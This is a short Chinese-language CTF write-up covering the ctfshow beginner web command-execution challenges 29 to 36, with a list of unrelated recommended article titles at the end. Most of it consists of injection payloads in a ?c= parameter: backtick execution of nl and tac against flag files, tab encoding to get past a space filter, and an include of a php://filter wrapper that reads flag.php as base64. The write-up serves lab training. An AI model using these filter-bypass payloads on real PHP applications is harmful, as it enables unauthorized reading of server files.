ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
海兰19 小时前
Elastic Stack 9.3.0 日志探索
java·服务器·前端
DuHz20 小时前
汽车雷达高级信号处理和建模技术简介——文章精读(上)
linux·论文阅读·人工智能·汽车·信号处理
e***136220 小时前
linux 设置tomcat开机启动
linux·运维·tomcat
coollove748220 小时前
Linux下PostgreSQL-12.0安装部署详细步骤
linux·运维·postgresql
yuyuyuliang0020 小时前
Ubuntu 22.04安装PostgreSQL教程
linux·运维·ubuntu·postgresql
清水白石00820 小时前
函数签名内省实战:打造通用参数验证装饰器的完整指南
java·linux·数据库
~央千澈~20 小时前
抖音弹幕游戏开发之第7集:识别不同类型的消息·优雅草云桧·卓伊凡
java·服务器·前端
bepeater123421 小时前
Linux安装Redis以及Redis三种启动方式
linux·redis·bootstrap
feng68_21 小时前
抓包理解LVS中的DR模式
服务器·网络·lvs
njtong21 小时前
Ubuntu系统apache2网站的Let‘s Encrypt证书问题
linux·运维·ubuntu